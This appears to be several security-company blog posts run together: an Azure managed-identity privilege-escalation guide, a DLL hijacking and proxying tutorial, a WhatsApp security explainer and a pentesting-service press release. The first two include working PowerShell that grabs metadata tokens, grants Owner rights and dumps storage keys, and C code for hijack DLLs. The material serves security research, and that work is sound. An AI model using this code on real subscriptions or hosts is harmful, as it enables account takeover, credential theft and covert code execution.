
Azure Privilege Escalation Using Managed Identities

Azure Managed Identities are Azure AD objects that allow Azure virtual machines to act as users in an Azure subscription. While this may sound like a bad idea, AWS utilizes IAM instance profiles for EC2 and Lambda execution roles to accomplish very similar results, so it’s not an uncommon practice across cloud providers. In my experience, they are not as commonly used as AWS EC2 roles, but Azure Managed Identities may be a potential option for privilege escalation in an Azure subscription.

TL;DR – Managed Identities on Azure VMs can be given excessive Azure permissions. Access to these VMs could lead to privilege escalation.

Much like other Azure AD objects, these managed identities can be granted IAM permissions for specific resources in the subscription (storage accounts, databases, etc.) or they can be given subscription level permissions (Reader, Contributor, Owner). If the identity is given a role (Contributor, Owner, etc.) or privileges higher than those granted to the users with access to the VM, users should be able to escalate privileges from the virtual machine.


Important note: Anyone with command execution rights on a Virtual Machine (VM) that has a Managed Identity can execute commands as that managed identity from the VM.

There are several potential scenarios that could result in command execution rights on an Azure VM.

Identifying Managed Identities

In the Azure portal, there are a couple of different places where you will be able to identify managed identities. The first option is the Virtual Machine section. Under each VM, there will be an “Identity” tab that will show the status of that VM’s managed identity.


Alternatively, you will be able to note managed identities in any Access Control (IAM) tabs where a managed identity has rights. In this example, the MGITest identity has Owner rights on the resource in question (a subscription).


From the AZ CLI – AzureAD User

To identify managed identities as an authenticated AzureAD user on the CLI, I normally get a list of the VMs (az vm list) and pipe that into the command to show identities.

Here’s the full one-liner that I use (in an authenticated AZ CLI session) to identify managed identities in a subscription.

(az vm list | ConvertFrom-Json) | ForEach-Object {$_.name;(az vm identity show --resource-group $_.resourceGroup --name $_.name | ConvertFrom-Json)}

Since the principalId (a GUID) isn’t the easiest thing to use to identify the specific managed identity, I print the VM name ($_.name) first to help figure out which VM (MGITest) owns the identity.


From the AZ CLI – On the VM

Let's assume that you have a session (RDP, PS Remoting, etc.) on the Azure VM and you want to check if the VM has a managed identity. If the AZ CLI is installed, you can use the "az login --identity" command to authenticate as the VM to the CLI. If this is successful, you have confirmed that you have access to a Managed Identity.

From here, your best bet is to list out your permissions for the current subscription:

az role assignment list --assignee ((az account list | ConvertFrom-Json).id)

Alternatively, you can enumerate through other resources in the subscription and check your rights on those IDs/Resource Groups/etc:

az resource list

az role assignment list --scope "/subscriptions/SUB_ID_GOES_HERE/PATH_TO_RESOURCE_GROUP/OR_RESOURCE_PATH"

From the Azure Metadata Service

If you don’t have the AZ CLI on the VM that you have access to, you can still use PowerShell to make calls out to the Azure AD OAuth token service to get a token to use with the Azure REST APIs. While it’s not as handy as the AZ CLI, it may be your only option.

To do this, invoke a web request to 169.254.169.254 for the oauth2 API with the following command:

Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing

If this returns an actual token, then you have a Managed Identity to work with. This token can then be used with the REST APIs to take actions in Azure. A simple proof of concept for this is included in the demo section below.
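
As a quick illustration (my own sketch, not part of the original demo), the token in that response can be parsed out and passed as a bearer token to the ARM REST API. The subscriptions api-version below is an assumption on my part:

$response = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
$token = ($response.Content | ConvertFrom-Json).access_token

# List the subscriptions visible to the managed identity (api-version assumed)
Invoke-RestMethod -Uri 'https://management.azure.com/subscriptions?api-version=2019-06-01' -Headers @{Authorization="Bearer $token"} |
    Select-Object -ExpandProperty value | Select-Object subscriptionId, displayName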

You can think of this method as similar to gathering AWS credentials from the metadata service from an EC2 host. Plenty has been written on that subject, but here’s a good primer blog for further reading.

Limitations

Microsoft does limit the specific services that accept managed identities as authentication – Microsoft Documentation Page

Due to the current service limitations, the escalation options can be a bit limited, but you should have some options.

Privilege Escalation

Once we have access to a Managed Identity, and have confirmed the rights of that identity, then we can start escalating our privileges. Below are a few scenarios (descending by level of permissions) that you may find yourself in with a Managed Identity.

  • Identity is a Subscription Owner
    • Add a guest account to the subscription
      • Add that guest as an Owner
    • Add an existing domain user to the subscription as an Owner
      • See the demo below
  • Identity is a Subscription Contributor
    • Virtual Machine Lateral Movement
      • Managed Identity can execute commands on other VMs via Azure CLI or APIs
    • Storage Account Access
    • Configuration Access
  • Identity has rights to other subscriptions
    • Pivot to other subscription, evaluate permissions
  • Identity has access to Key Vaults
  • Identity is a Subscription Reader
    • Subscription Information Enumeration
      • List out available resources, users, etc for further use in privilege escalation

For more information on Azure privilege escalation techniques, check out my DerbyCon 9 talk.

Secondary Access Scenarios

You may not always have direct command execution on a virtual machine, but you may be able to indirectly run commands via Automation Account Runbooks.

I have seen subscriptions where a user does not have contributor (or command execution) rights on a VM, but they have Runbook creation and run rights on an Automation account. This automation account has subscription contributor rights, which allows the lesser privileged user to run commands on the VM through the Runbook. While this in itself is a privilege inheritance issue (See previous Key Vault blog), it can be abused by the previously outlined process to escalate privileges on the subscription.
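
To make that abuse path more concrete, here is a rough sketch (mine, not from the original post) of how a user with only Automation account rights might stage and run a malicious Runbook. The cmdlets are from the Az.Automation module, and the resource group, account, and runbook names are hypothetical:

# Hypothetical names throughout; the Runbook body itself would use the Automation
# account's higher-privileged context (e.g. its Run As connection) to run commands on the VM.
Import-AzAutomationRunbook -ResourceGroupName 'RG-NAME' -AutomationAccountName 'AutoAcct' `
    -Name 'EscalationRunbook' -Type PowerShell -Path .\EscalationRunbook.ps1

Publish-AzAutomationRunbook -ResourceGroupName 'RG-NAME' -AutomationAccountName 'AutoAcct' `
    -Name 'EscalationRunbook'

Start-AzAutomationRunbook -ResourceGroupName 'RG-NAME' -AutomationAccountName 'AutoAcct' `
    -Name 'EscalationRunbook'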

Proof of Concept Code

Below is a basic PowerShell proof of concept that uses the Azure REST APIs to add a specific user to the subscription Owners group using a Managed Identity.

Proof of Concept Code Sample

All the code is commented, but the overall script process is as follows:

  1. Query the metadata service for the subscription ID
  2. Request an OAuth token from the metadata service
  3. Query the REST APIs for a list of roles, and find the subscription “Owner” GUID
  4. Add a specific user (see below) to the subscription “Owners” IAM role

The provided code sample can be modified (See: “CHANGE-ME-TO-AN-ID”) to add a specific ID to the subscription Owners group.
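
For orientation, here is a rough sketch of that flow (my own reconstruction, not the linked sample itself). The REST endpoints and api-versions are what I would expect to work, and the principal ID is a placeholder:

$h = @{Metadata="true"}

# 1. Subscription ID from the instance metadata service
$subId = Invoke-RestMethod -Headers $h -Uri 'http://169.254.169.254/metadata/instance/compute/subscriptionId?api-version=2018-02-01&format=text'

# 2. OAuth token for the ARM endpoint
$token = (Invoke-RestMethod -Headers $h -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/').access_token
$auth = @{Authorization="Bearer $token"}

# 3. Find the "Owner" role definition ID (api-version assumed)
$roleUri = "https://management.azure.com/subscriptions/$subId/providers/Microsoft.Authorization/roleDefinitions?api-version=2015-07-01&`$filter=roleName%20eq%20'Owner'"
$ownerId = (Invoke-RestMethod -Headers $auth -Uri $roleUri).value[0].id

# 4. Assign that role to our chosen principal (placeholder ID)
$assignmentId = [guid]::NewGuid()
$body = @{properties=@{roleDefinitionId=$ownerId; principalId="CHANGE-ME-TO-AN-ID"}} | ConvertTo-Json
Invoke-RestMethod -Method Put -Headers $auth -ContentType 'application/json' -Body $body `
    -Uri "https://management.azure.com/subscriptions/$subId/providers/Microsoft.Authorization/roleAssignments/${assignmentId}?api-version=2015-07-01"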

While this is a little difficult to demo, we can see in the screenshot below that a new principal ID (starting with 64) was added to the owners group as part of the script execution.

[Screenshot: proof-of-concept execution results]

2/25/20 – Update:

I created a secondary PoC function that will probably be more practical for everyday use. The function uses the same methods to get a token, but it uses the REST APIs to list out all of the available storage account keys. So if you have access to an Azure VM that is configured with Contributor or Storage Account Contributor, you should be able to list out all of the keys. These keys can then be used (See Azure Storage Explorer) to remotely access the storage accounts and give you further access to the subscription.

You can find the sample code here – get-MIStorageKeys.ps1
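
For reference, a stripped-down sketch of the underlying REST calls (my own approximation, not the linked function) might look like the following; the api-version values are assumptions on my part:

$h = @{Metadata="true"}
$token = (Invoke-RestMethod -Headers $h -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/').access_token
$subId = Invoke-RestMethod -Headers $h -Uri 'http://169.254.169.254/metadata/instance/compute/subscriptionId?api-version=2018-02-01&format=text'
$auth  = @{Authorization="Bearer $token"}

# Enumerate storage accounts in the subscription, then POST to each account's listKeys action
$accounts = (Invoke-RestMethod -Headers $auth -Uri "https://management.azure.com/subscriptions/$subId/providers/Microsoft.Storage/storageAccounts?api-version=2019-06-01").value
foreach ($acct in $accounts) {
    $keys = Invoke-RestMethod -Method Post -Headers $auth -Uri "https://management.azure.com$($acct.id)/listKeys?api-version=2019-06-01"
    "$($acct.name): " + ($keys.keys.value -join ', ')
}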

Conclusion

I have been in a fair number of Azure environments and can say that managed identities are not heavily used. But if a VM is configured with an overly permissive Managed Identity, this might be a handy way to escalate. I have actually seen this exact scenario (Managed Identity as an Owner) in a client environment, so it does happen.

From a permissions management perspective, you may have a valid reason for using managed identities, but double check how this identity might be misused by anyone with access (intentional or not) to the system.


Adaptive DLL Hijacking

DLL hijacking has been a centerpiece of our operations for many years. During that time we’ve explored the deep caveats which make this technique difficult to actually use in the real world. Our implementations have expanded to include export table cloning, dynamic IAT patching, stack walking, and run time table reconstruction. We explore the details of these techniques extensively in our Dark Side Ops courses and we’d like to share some of that knowledge here.

If you’ve ever “understood” DLL hijacking, only to return to your lab and fail to get it working properly, this post is for you.

TLDR? Check out Koppeling. You really should read it, though.

Refresher

This post won’t cover the basics of DLL hijacking. We expect you are familiar with module search order, KnownDLLs, “safe search”, etc. If you need a refresher, here are some links:

In addition, some tooling designed to discover/exploit hijacks:

When you first learned about DLL hijacking, you were likely shown a fairly primitive example which is trivial to exploit. Something like this:

void BeUnsafe() {
	HMODULE module = LoadLibrary("functions.dll");
	// ...
}

Here, we simply need to get some evil code into the correct location as “functions.dll”. LoadLibrary will ultimately trigger the execution of our DllMain function, where we might write something like this:

BOOL WINAPI DllMain(HINSTANCE instance, DWORD reason, LPVOID reserved)
{
	if (reason != DLL_PROCESS_ATTACH)
		return TRUE;

	// Do evil stuff
	system ("start calc.exe");

	return TRUE;
}

There are a few critical reasons exploitation is so trivial here. We’ll go through them here and then look at each one in more detail throughout the post.

  1. We don’t maintain the stability of the source process. In most instances, it will exit, crash, or otherwise misbehave as a result of our hijack. After all, it’s likely loading this DLL for a reason.
  2. We don’t maintain code execution in the source process. As an extension of 1, we are simply executing calc externally. We don’t care if the process stays up, or even what happens after we “pop our shell”.
  3. We don’t care about loader lock. Because our entry point is so simple, we don’t have to worry about executing complex code inside DllMain while the loader lock is held (which can be dangerous).
  4. We don’t have to worry about export names. Because this hijack occurs as a result of LoadLibrary, our malicious DLL doesn’t need to include any specific export names or ordinals.

If you’ve ever attempted to hijack in the real world, and something broke/failed, it was likely because of one (or many) of the 4 points above. Our time spent hijacking has yielded many tools and snippets which we’ll share throughout the post, so let’s get smarter.

Execution Sinks

There are two primary “sinks” from which DLL execution can originate. The names aren’t important, but we need consistent terminology to stay on the same page. Both of these sinks are provided by the module loader (LDR) within ntdll.dll. If an actor is interested in gaining execution as part of a DLL load, they require a call to ntdll!LdrpCallInitRoutine, triggering execution of evil!DllMain.

Static Sink (IAT)

The most obvious cause for DLL initialization is the result of its inclusion in a dependency graph. Specifically, its membership in a required module's import address table (IAT). This will most likely occur during process initialization (ntdll!LdrpInitializeProcess), but can also occur as a result of dynamic loading.

Here, the subsystem is simply calculating all required dependencies for a particular load event, and sequentially initializing them. However, before passing execution to the new module, its export table will be examined to ensure it provides the expected functionality. This is done by comparing the EAT of the child module and patching those addresses into the IAT of the parent module. A typical call stack looks something like this:

ntdll!LdrInitializeThunk <- New process starts
ntdll!LdrpInitialize
ntdll!_LdrpInitialize
ntdll!LdrpInitializeProcess
ntdll!LdrpInitializeGraphRecurse <- Dependency graph is built
ntdll!LdrpInitializeNode
ntdll!LdrpCallInitRoutine
evil!DllMain <- Execution is passed to external code

Dynamic Sink (LoadLibrary)

In a similar, but distinctly different process, active code is requesting a new module be initialized without specifying required functions. As a result, ntdll!LdrLoadDll will happily ignore the export table of the target module. This will likely be followed by GetProcAddress in an attempt to identify a particular function for run time use, but not always.

The dependency graph will be calculated with the requested module at its root and load events will occur as described above. This call stack looks something like this:

KernelBase!LoadLibraryExW <- Dynamic module load is requested
ntdll!LdrLoadDll
ntdll!LdrpLoadDll
ntdll!LdrpLoadDllInternal
ntdll!LdrpPrepareModuleForExecution
ntdll!LdrpInitializeGraphRecurse <- Dependency graph is built
ntdll!LdrpInitializeNode
ntdll!LdrpCallInitRoutine
evil!DllMain <- Execution is passed to external code

Takeaway

Hijacks are more complicated to implement when part of a static sink. We need to ensure our export table supplies the required import names of our parent module before we have control over execution. In addition, by the time we have control of execution the addresses in our EAT will have already been patched into the parent module. This complicates any solution which would just rebuild the export table at run time.

Function Proxying

Maintaining stability in our source process demands that we proxy functionality to the real DLL (if there is one). This essentially means linking our export table, one way or another, to the export table of the real DLL. Game hackers have been using this for a long time, but like hikers and hunters, the knowledge was slow to propagate to network security spheres. Here are some reference links that tackle proxying through different methods:

And here are some projects that implement these methods:

These techniques all accomplish the same outcome through slightly different means. Let’s take a quick look at some strategies for better understanding.

Export Forwarding

PE files provide a simple mechanism for redirecting exports to another module. We can take advantage of this and simply point our names at the same export from the real DLL. You can either rename the real file or just use the full path. Most do this using linker directives like so:

#pragma comment(linker,"/export:ReadThing=real.ReadThing")
#pragma comment(linker,"/export:WriteThing=real.WriteThing")
#pragma comment(linker,"/export:DeleteThing=real.#3")
#pragma comment(linker,"/export:DoThing=C:\\Windows\\real.DoThing")
// ...

Very easy, and we offload the work to the loader subsystem. It might look a bit obvious that we are attempting a hijack (e.g. every export is forwarded), but the advantage lies in its simplicity. One downside is the requirement to modify source code and/or build processes to prepare a DLL for hijacking; we'll solve this later.

The traditional format for the module name was *without* the “.dll” extension when defining a forward. Nowadays this doesn’t matter as the LDR subsystem has learned to ignore it. However, older systems like Windows 7 / Server 2008 will still fail if an extension is included. They also might crash when error reporting is attempted due to LdrUnloadDll being called too early.

Stack Patching

An equally elegant, but more dynamic, approach is to walk the stack backward from DllMain and replace the return value for the LoadLibrary call above us with a different module handle. As a result, any future calls to lookup functions will simply bypass us completely. It should be no surprise to the reader at this point that this technique will only work for dynamic sinks. With static sinks, the LDR subsystem has already validated our export table and patched IATs with its values, and it doesn't care what we have to say about module handles.

Preempt mentions this in a post about Vault 7 techniques, but they don’t go into much detail. Luckily we’re crazy enough to try this stuff, so we’ve written a small PoC which should demo the trick nicely for anyone who wants to run with it.

https://gist.github.com/monoxgas/b8a87bec4c4b51d8ac671c7ff245c812

Run Time Linking

Here we create a hollow list of function pointers, and compile our export table to reference them. The names will be there, but the functions themselves won't go anywhere useful. When we gain control in DllMain, we load the real DLL dynamically and remap all of the function pointers at run time. This is essentially re-implementing export forwarding… but with more code. We still have the same disadvantage of modifying source and/or build processes.

; Module definition (.def) file – exports point at our assembly wrapper stubs
EXPORTS

ReadThing=ReadThing_wrapper @1
WriteThing=WriteThing_wrapper @2
DeleteThing=DeleteThing_wrapper @3

; MASM assembly – each stub jumps through the ProcList pointer table
.code
extern ProcList:QWORD
ReadThing_wrapper proc
	jmp ProcList[0*8]
ReadThing_wrapper endp
WriteThing_wrapper proc
	jmp ProcList[1*8]
WriteThing_wrapper endp
DeleteThing_wrapper proc
	jmp ProcList[2*8]
DeleteThing_wrapper endp

// C/C++ source – fill the ProcList table with the real addresses at run time
extern "C" UINT_PTR ProcList[3] = {0};

extern "C" void ReadThing_wrapper();
extern "C" void WriteThing_wrapper();
extern "C" void DeleteThing_wrapper();

LPCSTR ImportNames[] = {
   "ReadThing",
   "WriteThing",
   "DeleteThing"
};

BOOL WINAPI DllMain(HINSTANCE instance, DWORD reason, LPVOID reserved)
{
	if (reason != DLL_PROCESS_ATTACH)
		return TRUE;

	// Resolve each export from the real DLL and store it for the jump stubs
	HMODULE real_dll = LoadLibrary( "real.dll" );
	for ( int i = 0; i < 3; i++ ) {
		ProcList[i] = (UINT_PTR)GetProcAddress(real_dll, ImportNames[i]);
	}

	return TRUE;
}

Run-Time Generation

We could also go crazy and just re-build the entire export address table at run time. Here we need not know what DLL we are going to hijack when we write our code, which is nice. We can also add a basic function which re-implements the Windows search order to try and locate the real DLL dynamically. It could also check for simple renames like .old and .bak within the current directory, just in case.

HMODULE FindModule(HMODULE our_dll)
{
	WCHAR our_name[MAX_PATH];
	GetModuleFileNameW(our_dll, our_name, MAX_PATH);

	// Locate the real DLL using our_name (re-implement the search order here)
	HMODULE module = NULL;

	if (our_dll != module) {
		return module;
	}

	return NULL;
}

void ProxyExports(HMODULE module) 
{
	HMODULE real_dll = FindModule(module);

	// Rebuild our export table with real_dll

	return;
}

BOOL WINAPI DllMain(HMODULE module, DWORD reason, LPVOID reserved)
{
	if (reason != DLL_PROCESS_ATTACH)
		return TRUE;

	ProxyExports(module);

	return TRUE;
}

This strategy, while elegant, suffers from being so dynamic. We no longer include the export names in our static table unless we explicitly add them (re: static sinks). In addition, we receive execution after the import tables (IATs) of other modules might already contain references to our old export table (static sinks again). There is no easy fix for the former that keeps us dynamic unless we simply add every export name we might expect to need across all DLLs. To fix the latter, we need to iterate loaded modules and patch in addresses to the real DLL. Nothing some code can’t solve, but a convoluted solution to some eyes. The bulk of this strategy can be found in the Koppeling project below.

Another caveat is that references to, and within, the export table are relative virtual addresses (RVAs). Because of their size (DWORD), we are limited to placing our new export table somewhere within 4GB of the PE base unless it can fit inside the old one. Not an issue on x86, but certainly on x64.

Takeaway

Export forwarding is the easiest solution when it comes to proxying functionality. It’s preparatory (we need to create the DLL with a specific hijack in mind), but the loader subsystem does the heavy lifting. We can make some nice improvements to the preparation process itself which we’ll look at later. We like the flexibility of run-time generation, but it has weaknesses regarding static-sinks and their requirement for export names to be included in the file on disk. When it comes down to it, we might as well automate export forwarding.

Loader Lock

The LDR subsystem holds a single list of loaded modules for the process. To solve any thread sharing issues, a “loader lock” is implemented to ensure only one thread is ever modifying a module list at one time. This is relevant for hijacking as we typically gain code execution inside DllMain, which occurs while the LDR subsystem is still working on the module list. In other words, ntdll has to pass execution to us while the loader lock is still being held (not ideal). As a consequence, Microsoft provides a big list of things you certainly SHOULD NOT DO while inside DllMain.

  • Call LoadLibrary or LoadLibraryEx (either directly or indirectly). This can cause a deadlock or a crash.
  • Call GetStringTypeA, GetStringTypeEx, or GetStringTypeW (either directly or indirectly). This can cause a deadlock or a crash.
  • Synchronize with other threads. This can cause a deadlock.
  • Acquire a synchronization object that is owned by code that is waiting to acquire the loader lock. This can cause a deadlock.
  • Initialize COM threads by using CoInitializeEx. Under certain conditions, this function can call LoadLibraryEx.
  • Call the registry functions. These functions are implemented in Advapi32.dll. If Advapi32.dll is not initialized before your DLL, the DLL can access uninitialized memory and cause the process to crash.
  • Call CreateProcess. Creating a process can load another DLL.
  • Call ExitThread. Exiting a thread during DLL detach can cause the loader lock to be acquired again, causing a deadlock or a crash.
  • Call CreateThread. Creating a thread can work if you do not synchronize with other threads, but it is risky.
  • Use the memory management function from the dynamic C Run-Time (CRT). If the CRT DLL is not initialized, calls to these functions can cause the process to crash.
  • Call functions in User32.dll or Gdi32.dll. Some functions load another DLL, which may not be initialized.
  • Use managed code.

Scary list, right?

In our experience, however, this list is not as bad as it might appear. For example, LoadLibrary is typically safe to call within DllMain. In fact during static sinks, the loader lock is not re-acquired as long as the same thread is still in initialization. The call to LdrLoadDll will simply re-trigger dependency graph calculation and initialization. Does this mean that Microsoft is wrong to publish the list above? Absolutely not. They are just trying to prevent issues wherever possible.

The real answer to “Can I do <questionable thing> inside DllMain?” is typically “it depends, but avoid trying it”. Let’s check out one example where LDR synchronization can cause a deadlock:

DWORD ThreadFunc(PVOID param) {
	printf("[+] New thread started.");
	return 1;
}

BOOL WINAPI DllMain(HINSTANCE instance, DWORD reason, LPVOID reserved)
{
	if (reason != DLL_PROCESS_ATTACH)
		return TRUE;

	DWORD dwThread;
	HANDLE hThread = CreateThread(0, 0, ThreadFunc, 0, 0, &dwThread);

	// Deadlock starts here
	WaitForSingleObject(hThread, INFINITE);

	return TRUE;
}

Regardless of the sink we use, our DllMain will get stuck waiting for the new thread to finish, but the new thread will be waiting for us to finish. You can see this in the two call stacks for the threads:

...
ntdll!LdrpCallInitRoutine
Theif!DllMain
KernelBase!WaitForSingleObjectEx
ntdll!NtWaitForSingleObject <- Waiting for the thread

ntdll!LdrInitializeThunk
ntdll!LdrpInitialize
ntdll!_LdrpInitialize
ntdll!NtWaitForSingleObject <- Waiting for LdrpInitCompleteEvent
         (can also be NtDelayExecution/LdrpProcessInitialized != 1)

Inside a dynamic sink, you’ll probably see the deadlock occur in LdrpDrainWorkQueue (as the process has already been initialized by then).

ntdll!LdrInitializeThunk
ntdll!LdrpInitialize
ntdll!_LdrpInitialize
ntdll!LdrpInitializeThread
ntdll!LdrpDrainWorkQueue
ntdll!NtDelayExecution <- Waiting for LdrpWorkCompleteEvent

This outcome is frustrating, because starting a new thread is the easiest way to avoid LDR conflicts. We can collect execution in DllMain, kick off a new thread, and let our malicious code run there once the process has finished initializing. To avoid the deadlock, we could remove the WaitForSingleObject call like so:

BOOL WINAPI DllMain(HINSTANCE instance, DWORD reason, LPVOID reserved)
{
    if (reason != DLL_PROCESS_ATTACH)
        return TRUE;

    DWORD dwThread;
    HANDLE hThread = CreateThread(0, 0, ThreadFunc, 0, 0, &dwThread);

    // WaitForSingleObject(hThread, INFINITE);

    return TRUE;
}

This works if the process stays up long enough for our code to execute, but this is a rare occurrence. Most likely, we will return execution to the primary module and it will exit quickly or throw an error if we haven’t done proxying properly. Our thread will never get a chance to do anything useful.

Hooking for Stability

Lucky for us, we do hold execution long enough to implement a hook, so we can try to take over primary execution once LDR is done. Where exactly we place this hook is going to depend on where in the execution chain we sit.

  • Pre-Load: The process is still being initialized and execution has not been handed over to the primary module. In this case, we’d likely want to hook the entry point of the primary module.
  • Post-Load: The process has already started core execution, and we might be loaded as a consequence of a LoadLibrary call. The most optimal approach is to hook the last function in the call stack that is part of the primary module. Whatever issues/errors bubble up can then be ignored.

To differentiate between these two scenarios we can just keep walking backward in the stack. If we find a return address for the primary module, we are probably post-load. Otherwise, the process likely hasn't kicked off yet and the entry point is our best bet. Naturally, we've built a proof of concept already so you don't have to pull your hair out:

https://gist.github.com/monoxgas/5027de10caad036c864efb32533202ec

Takeaway

Loader lock represents some challenges, but nothing too difficult as long as we respect it. Starting a separate thread for any significant code is the best option. In situations where we need to keep the process alive so the thread can continue to run, we can use function hooking.

Koppeling

We started this post by introducing various complexities of hijacking. Let’s review and pair them up with relevant solutions:

  1. Stability of the source process: Use function proxying, avoid loader lock.
  2. Maintaining code execution inter-process: Use proxying and/or function hooking.
  3. Complexities of loader lock: Use new threads and/or function hooking.
  4. Static export names: Use post-build cloning, static definitions, linker comments, etc.

If there is one thing to communicate, however, it's that the solution space is quite large and everyone will have preferences. Our current "best" implementation combines the simplicity of export forwarding with post-build patching for flexibility. The process goes like this:

  1. We compile/collect our “evil” DLL for hijacking. It doesn’t need to be aware of any hijacking duty (unless you need to add hooking).
  2. We clone the exports of a reference DLL into the “evil” DLL. The “real” DLL is parsed and the export table is duplicated into a new PE section. Export forwarding is used to correctly proxy functionality.
  3. We use the freshly cloned DLL in any hijack. Stability is guaranteed and we can maintain execution inter-process.

We’re releasing a project to demonstrate this, and some other, advanced hijacking techniques called Koppeling. Much like our sRDI project, it allows you to prepare any arbitrary DLL for hijacking provided you know the final path of the reference DLL. We hope you find use for it and contribute if you love hijacking as much as we do.

https://github.com/monoxgas/Koppeling

Wrap Up

Our team is very passionate about not only how to weaponize a technique, but how to do it with stability and poise. We want to avoid impact to customer environments at all costs. This kind of care demands hours of research, testing, and development. Our Slingshot toolkit maintains seamless integration with the techniques we’ve detailed here to ensure our team and others can take full advantage of hijacking. As mentioned earlier, we also dive deeper into these topics in our Dark Side Ops course series if you’re hungry for more.

We hope this post has provided a deeper understanding of this often misrepresented technique. Till next time.

– Nick (@monoxgas)


Why Do People Confuse “End-to-End Encryption” with “Security”?

It is very common to hear people make blanket statements like “WhatsApp is secure,” but they rarely truly understand the actual security controls that WhatsApp is providing. In fact, this notion of being “secure” is one of the main reasons why WhatsApp gained so much popularity and built such a big user base.

In today's world where everything is on the Internet, people tend to crave some privacy, especially when they are communicating with other people and sharing personal conversations. The fact that WhatsApp offers a secure communication channel, where messages between users are fully encrypted to the point that the company providing the service cannot see them, gives people a false sense of security when using WhatsApp.

What “Security” is WhatsApp Really Providing?

Let's first make sure we understand what security control WhatsApp is claiming it provides. WhatsApp uses the Signal protocol. The encryption scheme is simply asymmetric encryption of messages between the users, and the transmission of the encrypted messages is facilitated by a server provided by WhatsApp.

So, the way the message is protected while in transit from the sender to the intended recipient is secure.

What Other Aspects of Security Do People Need to be Mindful Of?

When it comes to security, there’s a lot more involved than just securing the data while it’s in transit. If securing applications were as simple as securing the communication channel, then websites wouldn’t have any vulnerabilities in them once they had implemented SSL, but we know that is not the case. So why would it be any different for WhatsApp, or any other mobile app for that matter?

Just because the communication channel is secure doesn't mean that the rest of the application is secure too. What people tend to forget is that the content of the messages that they're receiving may still be malicious and have a security impact based on the user's behavior.

Phishing Attacks

Let’s say a user is sent a phishing link, and the user clicks on it to see where it takes them – they will fall victim to the attack just like they would have if they had received the same link via email or any other method. Just like people are told never to click on a link from an email – especially if it’s from someone they don’t know or trust – the same rule applies here.

Malware

Malware is everywhere on the internet, and being able to identify and avoid opening infected files is a common challenge. Just as malware can be downloaded while browsing the web or by opening email attachments, opening a potentially infected file received through a messaging app has the same consequences. There are many stories in the news today about people who opened a video clip, audio file, etc. and were infected with malware.

The App Itself

The app that you are using may itself be vulnerable and allow attackers to remotely execute code on a user's device. WhatsApp had a buffer overflow vulnerability that allowed attackers to easily execute code on WhatsApp users' devices. Details of the vulnerability itself can be found on the CVE-2019-11931 page. Almost all users of WhatsApp on Android, iOS, and Windows were affected. This wasn't the only vulnerability found in WhatsApp: in another case, attackers were able to inject spyware onto phones by exploiting a zero-day vulnerability. The most damaging part of this attack was that it did not require any action to be taken by the user being infected. Read more in this article by the Financial Times.

Other than WhatsApp, there are also cases where an app created specifically for secure communications was designed incorrectly and ended up all over the news. The most recent example that comes to mind is when the French government launched a new messaging app for their state employees only, but the account sign-up process was flawed and allowed anyone to sign up and message using the system. Details of the issue can be found here.

Why Should You Care?

People need to understand the consequences of using apps for communication purposes, especially when they may be using these apps for business. Organizations will typically have contracts with service providers like Slack, Microsoft Teams, etc. to have official channels of communication. This allows the organization to securely manage their employees' communications, and ensure that sensitive information stays secured correctly, both in transit and at rest. In addition, in the event of lost devices, these services allow organizations to remotely delete any sensitive data that may have been stored on the devices themselves.

One example of the serious concern around public officials using WhatsApp for official communications arose when it was discovered that Jared Kushner may have been using WhatsApp for his official communications. Read more about the concerns here.

Using proper communication channels is critical when conducting business, given the sensitive nature of almost all the communication and data that enable running a successful business.


NetSPI Introduces Penetration Testing as a Service (PTaaS) Powered by Resolve™

PTaaS will be demoed at RSAC 2020, showcasing how the delivery model enables organizations to keep pace with today’s cybersecurity landscape.

Minneapolis, Minnesota  –  NetSPI, the leader in enterprise security testing and vulnerability management, today debuted its new delivery model, Penetration Testing as a Service (PTaaS) powered by the Resolve™ platform. PTaaS puts customers in control of their pentests and their data, enabling them to simplify the scoping of new engagements, view their testing results in real time, orchestrate quicker remediation, and perform always-on continuous testing.

Taking note of customer needs and emerging attack surfaces, NetSPI has leveraged its knowledge in traditional, point-in-time pentests to develop a scalable, always-on model for enterprise security testing. NetSPI PTaaS delivers program level security testing comprised of an expert manual pentesting team enhanced by automation.

“During our 20 years of penetration testing, our clients have consistently asked for guidance to understand, report on, and remediate their security vulnerabilities. While we’ve been excited to provide this assistance, we also knew there was more we could do to meet all our clients’ needs, which led to the creation of PTaaS,” said NetSPI President and Chief Operating Officer, Aaron Shilts. “As a leader in the cybersecurity industry, our experts have always found vulnerabilities that others miss, but PTaaS allows us to go a step further – delivering clear, actionable recommendations to our customers, enabling them to find and fix their vulnerabilities faster.”

According to Gartner, “although separate from VA, penetration testing plays an important role in the prioritization and assessment of vulnerabilities from Gartner’s RBVM (risk-based vulnerability management) methodology. These services are testing your environment, with real-world skills and knowledge of the prevailing threat landscape. Security leaders need to take these recommendations and apply it directly in your security programs to address their prioritized findings.”*

NetSPI believes PTaaS powered by Resolve™ solves critical cybersecurity challenges, by enabling:

  • Real-time accessible reporting: Gone are the days of managing multiple static PDF reports with out-of-date vulnerability information. With PTaaS powered by Resolve™, organizations can access their data in real-time as vulnerabilities are found by the NetSPI team of experts, and easily generate custom reports as desired.
  • Increased speed to remediation: PTaaS powered by Resolve™ helps organizations fix their vulnerabilities faster than traditional pentesting. Resolve™, a SaaS platform, will house all vulnerability data and provide remediation guidance for real-time access and assessment. In addition, customers can communicate with NetSPI security experts via the platform for additional clarity, to request remediation testing, or to scope a new engagement.
  • Continued manual testing: NetSPI’s team of highly skilled employees will continue its award-winning service of deep-dive manual penetration testing as automated pentesting and scanners will only ever find a portion of an organization’s vulnerabilities. While automation creates efficiencies, the human touch is also necessary to identify potentially high and critical severity threats that can only be discovered by manual testing.
  • More testing: Organizations with a mature security program understand that point-in-time testing is not a viable model to continuously secure their applications and networks. New code and configurations are released every day, and PTaaS powered by the Resolve™ platform’s continuous security program delivers results to customers around the clock, enabling them to manage their vulnerabilities easier and more efficiently.

Learn more about NetSPI PTaaS powered by Resolve™ here or set up a 1:1 meeting at RSAC on February 24-28 online here.

